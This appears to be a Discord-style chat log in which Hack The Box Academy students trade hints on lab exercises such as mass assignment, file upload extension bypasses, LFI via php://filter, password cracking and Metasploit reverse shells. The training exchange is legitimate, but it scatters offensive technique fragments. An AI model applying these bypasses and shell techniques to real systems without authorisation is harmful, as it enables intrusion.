as curl is an alias of invoke-webrequest i believe so it has some other interesting quirks
ok ill keep that in check
curl.exe is not the same as curl which is an alias
ye
Also windows curl.exe requires a -F where on Linux it's lowercase.
This makes so much sense now
Tried using curl on windows and the syntax was insane
anyone ran into this issue while on the Public exploits on Getting started:
found the exploit and ran the path in msf .
] File saved in: /home/htb-ac-680000/.msf4/loot/20240913213839_default_94.237.59.63_simplebackup.tra_442010.txt
however when i concatenate the file there's no mention of flag.txt or even a file within the directory it's mentioned in.
i just get output of backup w/ no flag.
edit: found the issue reading matters
Does anybody know why I don't have the option to send images to the channel? I checked in other channels and I do have it, but not in this one
I'm stuck on "Hunting for Stuxbot" in "Intro to Threat Hunting and hunting with elastic"
I have the cmd args after mimikatz, but it doesn't work?
Hello everyone
Yo
I want to learn Hydra anyone who wants to help me dm me
There’s a module for that
I’m new can you guide me
You have an academy account?
Am I able to remove my card details from the update payment method option?
You’ll need to ask support to do this
Need to speak to a person? Learn how to reach our support via HTB Labs.
Module: Attacking Common Applications
Section: Web Mass Assignment Vulnerabilities
Link to section: https://academy.hackthebox.com/module/113/section/2160
I just finished reading the section, but I'm afraid I still don't understand the whole "Mass Assignment"?
From what I can see and understand, since we have the source code, we know of a hidden parameter during registration that we can set that allows us to bypass the registration checking step.
Where does the mass assignment come into play here? Is it something in the framework that allows developers to mass import data?
It's defined as:
Several frameworks offer handy mass-assignment features to lessen the workload for developers. Because of this, programmers can directly insert a whole set of user-entered data from a form into an object or database.
But that just sounds like any other form to me? 🤔
it allows assignment of parameters that may not be known to the user
also the key thing here is "database or object"
So this can be the case for pretty much any form? Having hidden parameters that aren't protected, it doesn't just have to be "certain" frameworks?
it's not really "hidden parameters" it's parameters that don't exist anywhere visible to the user
Not sure I understand what you're trying to say?
in the example you assign a value to X which any value in that X category just forces it to be true
since it's being directly input into a database, you're manipulating the data in a way that forces it to behave in certain ways, such as creating an "unverified" user
Yeah, because of the way the code is written.
What I still don't get is where the "mass assignment" comes into play?
Are they just saying that such vulnerabilities exist because the devs were more focused on ease of import of data?
So, the only way then to identify these "parameters" is to obtain access to the source code.
or send a request to the api after creating a user
You saying the API may reveal one of these "parameters"?
yes
And then we just try bypass it by guessing what to change the parameter's value to?
not necessarily guess
like yes it's a guess, but it's calculated based on various factors
Website with the collection of all the cheat sheets of the project.
The Ten Most Critical API Security Risks
So... basically the form field input names match that of the object and are directly mapped. Assuming we have access to the source code, we can then identify other parameters that were not part of the front-facing form that we can take advantage of? Am I understanding that right?
in the owasp link there's no access to the source code required
I see. Thanks for the helpful references.
Wasn't sure how to put an explanation in my notes, these references gonna be good tho.
I'm on Password Attack - Hard. How long is the cracking for initial foothold expected to take? Can't tell if I'm down a rabbit hole at this point, been waiting for 20 mins.
i hope you're not using rockyou :)
I'm using the provided wordlist with the custom ruleset
and what service are you targeting?
trying SMB
also the assessment gives you a name to start with
yep that's the username I'm targeting
if you're not getting it then try other services
Alright I'll try that next. Longest I should wait on these challenges should be 20 mins?
between 20 and 30 minutes
File upload attack module, Blacklist filter section. I hid the extension to not spoil anything. why does my shell get printed in plaintext instead of doing its functionality?
just a heads up in "CORS Misconfigurations" section's challenge. I got different behavior from Firefox (+ FoxyProxy) and Burp's Chromium. Burp's Chromium worked as intended, whereas Firefox just redirected me back to the login page, couldn't access the profile page.
Who can I contact for help with SA 1 on the Introduction to Windows Evasion Techniques module?
have u tried other file formats?
burp repeater is ur friend here
php2-7,pht,phtml
the ones that aren't blocked display in plaintext
there is more than php
you and i know its not asp based 
yea but if php doesn't work what do i do?
take a look at limited file uploads again
that comes later in the module
wait my fault 💀 💀
i thought u were doing skill assessment
lemme see
@vocal bridge have u checked all extensions?
I think i checked all extensions
check the extension links in that section and fuzz
Hey everyone. I'm not here for anything in particular, just to commemorate the 2 hour waste due to a missing letter in a command making me run in circles.
Thus, to everybody, always try something twice before leaving it for done because it's really likely that you missed a goddamn "-h" in your mysql connection command
isnt that the most important part of the command 
I changed wordlists for fuzzing from seclist to payload all the things
did u get it?
actually, I've used the host, of course, just missed that "-h" in front of it.
To me, at least, it comes with extreme confusion that any tool has its own namings, how comes sometimes I do need to express an user as "-u" sometimes as "-l" sometimes without flag 
yup
thats just how it is sometimes
help command usually has the answer
¯_(ツ)_/¯
marcielee classic
yea, I think the main issue, at least at the beginning since I'm still kinda new, is the fact that once you try a command and it clearly returns you an access denied error, you assume that then this must not be the right way. Then you notice the goddamn flag's missing 
yeah, that happens to everyone, but it helps us never do that mistake again
CPTS - password attack lab - medium
I have got initial access to target as J***on but I tried my best to escalate privileges.
can anyone help me!!
simply use: get file_name
anyone who completed osint corporate recon module?
i want to know if its worth it for 1000 cubes
😉 look back at the documentation you got
I got credentials from documents and got access to target via SSH
What service i have to look for?
The service is mentioned in the document
you don't? (sorry, my first reply went to wrong line)
sorry, did not get it?
Module: Attacking Common Applications
Section: Attacking Applications Connecting to Services
Link to section: https://academy.hackthebox.com/module/113/section/2154
I'm getting the following error when attempting to solve the question at the end of the section:
(gdb) run
Starting program: /home/htb-ac-773541/octopus_checker
Warning:
Cannot insert breakpoint 1.
Cannot access memory at address 0x****
I've tried running gdb with sudo privileges, and I'm still receiving the same error. I'm pretty sure I've got the right memory address.
I accidentally replied to your first inquiry about the password attack lab then deleted it, because "you don't?" was referring to you not having credentials for the service. Sorry I'm confusing. I just woke up.
Have you tried accessing mysql once you're onto the box?
super thanks
i cannot access skill assessment ip, why? i can access other modules labs but not for skill assessments
try switching to a different region and redownloading the VPN.
it doesn't work
What do you mean you can't access them? Not every machine can be pinged
i'm doing wordpress and xss modules. labs are accessible but not skill assessment. i can ping ip but can't browse
You may need to check your browser DNS settings
yes
It’s the wrong address then
This is the address: ||0x11b0||
Run and disass main
Run before disass main?
Yes with the main breakpoint
This is from the pwn box.
Just did it in this order, still didn't work...
gdb-peda$ set disassembly-flavor intel
gdb-peda$ run
gdb-peda$ disas main
gdb-peda$ b *0x5555555551b0
gdb-peda$ run
I still received the error.
Nvm, it worked. I just put the incorrect memory address. The address changed after I ran it first. Thanks @safe star
I have a question regarding windows priv esc module Kernel Exploit section. In the examples they have shown, there is access to a .sln file which makes compiling the exploits pretty easy. But what do you do if that file is not present? Do you try and compile it with mingw32/64 on linux, or compile it with cl.exe on a windows vm with visual studio? A bit lost when it comes to windows exploit compilation when the author does not provide the .sln file
Since there isn't many comments on directions.
Anyone stuck on the final SA for the Advanced SQL Injections Module, I can help out giving some directions
https://academy.hackthebox.com/achievement/799850/188
hello folks
can someone please help me with this question: What OU is the Help Desk group managed by
LDAP module, AD path.
I do not see any attribute regarding someone managing that OU. Having said that, I entered all Members of that OU, and it still is not accepting the answer.
explore all the OU's its in there... its buried but its in there
also do you know how to search ADUC? right click the DC (or click the little magnifying glass thingy... i never use that) and click "search objects" i think its called. Also while you're at it, use the powershell cmdlets to search AD as well, this will be more helpful as i think the labs want you to answer some ?s in the form of their canonical names (CNs) and that wont really be revealed in AD's search feature (easily)
im recalling a bunch of this from memory so forgive if theres an errant click or menu item name here or there, but thats the gist
Module: shells and payloads
Section: Skills Assessment
Question: Exploit the target and gain a shell session. Submit the name of the folder located in C:\Shares\ (Format: all lower case)
Im confused on how to actually craft the payload and exploit it
i haven’t done this module, but it looks like you’re trying to upload a shell to the target with msfconsole?
set rhosts to target IP, launch a nc listener on your local machine with port 4444, and hit run on metasploit and see if it connects back?
The citrix breakout part of the Windows Priv esc module was very fun.
Ended up doing some janky stuff but it worked 🤷♂️
no need for nc listener , msfconsole will do that
i was going to say this
okay. there’s not a lot of context in the screenshot, and without having done this module yet i wasnt sure if he was trying to trigger a separate shell from metasploit, which ive done on live machines before lol
thinking too much into it i guess
myself but however, i will give more context rq
there is no crafting, its all syntax/cmds... in addition to the help cmd you want to add to your notes: show options (which should show you how to config and run the payload), info (which shows details about the attack), set (which lets you set the configs), then exploit|run (which fires it off)
maybe you need to upload it in other place
is it a l4j attack? looks like it might be l4j.
yeah theres a browse option to upload the file, my issue is i dont know what im supposed to really do here, cause it's asking me for zip files, i've never worked with zips for something like this
just thought probably metasploit would have something for me to do the upload
idr but just play with it , try to upload a zip and see how the web app deal with it
have you found RCE or SSRF in the app? you may need to upload a zip, figure out a way to bypass extension reqs (file upload bypass) or some such, then RCE it
I am in legacy which is retired
I use msfconsole but it didn't work
i just follow the walkthrough
some one help me
if you have an SSRF you may not need to figure an upload bypass
they're using apache tomcat i just know it's a file upload
the module teach you how to craft basic payload to get shell , I don't think there's ssrf
yeah no ssrf on this one
hmmz, ok are you intercepting the upload request? have you tried an extension bypass?
no we're not dealing with intercepting anything, nothing related to burpsuite
right, but you're uploading a file
yes
and you have an extension requirement
and your payload in a zip will not execute
whats this upload do? is it a plugin?
its supposed to give me a reverse shell
no no no
whats the application do, what is the reason for the upload?
think about this not from the attack forward but from the application backwards
we're trying to manipulate the application to give us access... if this upload installs a plugin module or something, then we need to organize our attack from that manner
if this upload stores a zip archive for file sharing, etc. etc.
holdon
look at me acting like i know what im doin
i guess the academy does work?
this upload form might be a red herring as well, so explore the application for attack surface
check out versions (and any associated CVEs) for all tooling used on the application
thanks for your.help
Hey here's a simple one, maybe im not firing on all cylinders here... im working the BBH -> LFI -> PHP Filter section
https://academy.hackthebox.com/module/23/section/1492
and its discussing a parameter vuln to LFI that does not return any data with a payload like ?lang=config.php but DOES return the data when you base64 encode it first (with the php://filter)
why would it be vuln to one manner but not the other? weak sanitization/filtering? bypasses were discussed in a previous section, some filter bypassing techniques etc but the payload does not utilize any bypassing teks other than the base64 encoding filter, im kinda at a loss for why the simple payload returns nothing but the encoded one does
nvm this may be due to how config.php does not have any print statements? i guess?
What magnifying thing ? I’m doing this command line . I’m avoiding using the GUI
ok so whats your cmdlet look like?
you should be using powershell for this and not the deprecated stuff
in case you were using like net or whatever the old stuff is
1 sec
Get-ADGroup -Identity "Help Desk" -Properties *
Then trying to visually look for it.
Ok so in the earlier sections it talked about the different kind of AD Objects, did you take notes on that?
Yes
we're looking for an OU an organizational unit, not a group.
Luckily powershell has a handy cmdlet that will burst fire across all objects with Get-ADObject its syntax is a little more verbose but you only have to remember one command
Get-ADOrganizationalUnit
yes thats an option as well
Probably
i would use that one and also use the get-adobject youll prob find with time you prefer the latter so you dont waste precious space in your brain for every granular powershell (ad) cmdlet
Thank you
No problem, use chat gpt to provide the get-adobject cmdlet with the required syntax to find OU's "like" name , its a little trickier than the more granular cmdlets but you should see how its used as well
Yeah, I’ve used it before for some nxc flags and stuff . Good tip
OU was buried no?
hey guys im stuck on fingerprinting module, i saw on the web that we have to find some credentials but i "think" i tried all the other ports but i have nothing and i can't go in the TechSupport dir
any help pls ^^
can you share a link to the section you're on?
Footprinting Footprinting Lab - Medium
ooooh find something
wait a minute --
What the hek is going on with the modules and the latest update when try (show solution) to check where is the missing part of understanding the question it doesn’t show the answer
Yet i have been trying for whole night and the answer was the same as the one I tried first time but for some reason didn’t work at first nor the 2nd time and tried many different answers until i back to what I believe and tried first answer and it was correct this time
Module BROKEN AUTHENTICATION
I’m stuck with this question now for couple hours no answer is correct!
im in ^^
oh goodness i dont have access to that one, thought i did. wish i could be more of help
right on
hi everyone
if someone got time, im a noob trying to finish linux beginner guide x0 im stuck at this question: What is the name of the network interface that MTU is set to 1500? i type an ifconfig and check the interface which was ens3 or tun0 but both of these responses don't work for going further x) if someone got a clue im open.
which section ?
What module are you talking about?
Attacking common applications module Gitlab discovery and enumeration section
Hey guys im back, i got some credentials but i can't connect to the sql server anyone know why?
Good evening, I have the impression that there is a question that is a bit incorrectly phrased in the module "Windows Event Logs & Finding Evil," chapter: "Windows Event Logs."
I have found the answer, but the question did not provide the correct information. The answer is located elsewhere, and I found it by chance. I am referring to the first question.
And I would like to know if it is intentional, and if so, why.
That looks familiar and it threw me off for a good while too. Keep looking for other ways.
What module/section is it again?
footprinting medium lab
tried to connect with the sa creds with rdp but not working
I don't have any insight as I have not done that module, but you can search for or lodge the issue in #1234357888114364508.
Found it, Thanks!
That sounds like a pretty good idea.
Possibly a stupid question. Just finished my part time cybersec degree and looking for hands on/practical learning now, hence HTB academy. The x days for a path, what is counted as a "day"..8 hours learning, 24 hours, etc? Just trying to formulate a realistic study plan for SOC fundamentals and the CDSA
Hey anyone know how to search for password in gitlab in example project in gitlab
1 day is 8 hours
Brilliant, thanks for the response!
i know but it don't work haha
you can share the command you're using if you'd like.
@tender nimbus ^^ Sorry to @ you but I'll be stepping away from my deck in like 10 minutes.
Hlo
np so here's where i'm stuck, i gained access to the pc of alex with xfreerdp, i gained access by mounting a share that i found, by using the same credentials i mounted another share where there were other credentials of a database, but those credentials don't match. I saw on the web that there is another user who i need to connect as bcs alex doesn't have access to the db, here is my rdp command.
Hey anyone know how to search for password in gitlab in example project in gitlab in Attacking common applications module, Gitlab discovery and enumeration section
lol. ok good. got it?
yes
I was trying to think of how to lead you there without giving you any more of a hint 😅
oepsie
😉
Sorry, @limpid hemlock I don't mean to keep aging out your request. I haven't completed the module in question so I don't feel qualified to offer specific help. I have used git for some years so I might suggest: can you pull the project locally, print all the logs to stdout and do any filtering for password/username mentions?
Just click around the various things
hey so I just started and I was wondering about the instance. It says you can only have one per day but I used it yesterday. Does it take the time all the way till the exact time that you lost it for it to recharge?
I believe so
Oh damn thank you
I've generally used my own vm so it's not been an issue ¯_(ツ)_/¯
VM?
Virtual Machine
oh yeah of course how would I spawn targets into that though
You don't spawn targets in your vm
There's a separate button that spawns target (and isn't limited/day)
You connect to the targets generally through a vpn connection to htb
All you need to know about the VPN Connection for Academy
so for the lesson I'm doing rn I dont have to use the box at all?
Generally no, there's a handful of times where they specifically call out something on the pwnbox
But everything is doable from your own setup, more or less
Oh so I've been overcomplicating things thank you so much this makes it way easier and makes more sense. I did the intro stuff a year ago and just started actually doing modules
I still don't get where the target is spawning though how can I "find all TCP ports on your target. Submit the total number of found TCP ports as the answer." If I can't access the target or system at all
No spoilers
.
Spawn target and spawn instance are two separate functions
You can access the targets from your own vm utilizing the vpn download and openvpn
So I have to set up my own VM in order to do this?
Yes as I said earlier
If you are using linux as your base OS you can do it but generally not recommended to do it on your host OS
well that makes sense because that's what I was doing before. thanks
Hi,
My first interaction here (english is not my first language)
I am a data engineering student (quite new at cybersec), and I am doing the Network Enumeration with Nmap module
Currently stuck on the before-last exercise, "Firewall and IDS/IPS evasion - Medium Lab" where I am supposed to find the Target's DNS server version
I am trying not to spoil anything so I don't think I can say what I did this far, but I don't really understand the hint: During the meeting, the administrators talked about the host we tested as a publicly accessible server that was not mentioned before.
For context: there was a previous exercise that required to find the host's OS, with a relatively permissive IDS/IPS (but still existent)
On the dns
Consider each target of the skill assessments independent
ok
why i cannot open this page?
from this module
Did you press enter?

I'm assuming you don't have burp running
Which may have proxy turned on
do you mean burpsuite?
Can you curl the website
Yea
Oh wait
Even simpler
You need to specify the port
I understand even less the hint then, why is it referring to something not mentioned before?
?
They are proposing the skill assessments as different levels of security maturity
So, are my /etc/hosts settings correct?
Yes
You need to specify the port in the url
Look at the example
It calls out admin.academy.htb:PORT
what if the target is running http instead of https
Http not https